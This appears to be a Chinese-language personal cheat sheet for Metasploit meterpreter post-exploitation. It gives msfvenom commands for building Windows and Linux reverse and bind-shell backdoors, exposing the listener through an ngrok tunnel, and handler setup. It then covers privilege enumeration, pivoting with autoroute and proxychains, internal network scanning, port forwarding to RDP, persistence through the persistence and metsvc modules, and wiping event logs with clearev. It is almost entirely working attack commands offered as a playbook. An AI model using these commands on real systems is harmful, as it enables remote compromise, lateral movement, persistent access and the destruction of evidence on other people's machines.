@highKer2月前

06/17
16:37
笔记

msf_meterpreter_1

0x01 生成远控后门(无免杀,找免杀请移步别处

windows :

反向连接

> msfvenom -p windows/meterpreter/reverse_tcp lhost=反弹IP lport=反弹端口 -f exe -o 文件名

正向连接

> msfvenom -p windows/meterpreter/bind_tcp lport=监听端口 -f exe -o 文件名

linux:

反向连接

> msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=反弹IP lport=反弹端口 -f elf -o 文件名

正向连接

> msfvenom -p linux/x86/meterpreter/bind_tcp lport=监听端口 -f elf -o 文件名

0x02 映射本地msf到公网

解决方案很多,我用的是sunny ngrok

使用很简单,后台创建好tcp隧道,本地一条命令了事

> ~/Desktop# ./sunny clientid ID

0x03 创建会话

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 127.0.0.1
> set lport 本机监听端口
> run

0x04 获取信息

查看用户

> getuid

查看补丁

> run post/windows/gather/enum_patches

根据版本号可以使用相关的exp进行提权,也可以使用meterpreter自带的getsystem模块

使用shell可以打开cmd

通过查询arp缓存表,网卡配置等可以对内网机器进行下一步攻击

> arp -a
> ipconfig /all

0x05 网络代理

由得到的网卡信息,添加路由

> run get_local_subnets
> run autoroute -s x.x.x.x/x

验证添加的路由

> run autoroute -p

添加路由之后可以使用meterpreter做代理,也可以使用socks+proxychains的方法代理

meterpreter

> getproxy

socks+proxychains

> use auxiliary/server/socks4a
> proxychains xxx

0x06 内网扫描

由于上面添加了路由,可以直接使用db_nmap扫描,但是pivot只能在msf中用,想使用msf以外的脚本还得是proxychains

> db_nmap -sV 目标IP/划分子网

db_nmap还会自动将扫描结果写入数据库

> services

0x07 端口转发

使用meterpreter内置的portfwd,或者lcx(Linux有portmap)等工具

portfwd:

> portfwd add -l 6666 -p 3389 -r 127.0.0.1
> rdesktop 127.0.0.1:6666

lcx:

> lcx.exe -listen 3333 4444 #监听机
> lcx.exe -slave 监听机ip port 127.0.0.1 3389

0x08 长期维权

meterpreter会话不适合长期维持权限,但是可以使用它内置的persistentce模块写入,或者metmvc创建服务

persistence:

> run persistence -X -i 10 -p 端口 -r 反向连接IP

metmvc:

> run metsvc -A

0x09 脚底抹油

> clearev

msf_meterpreter_1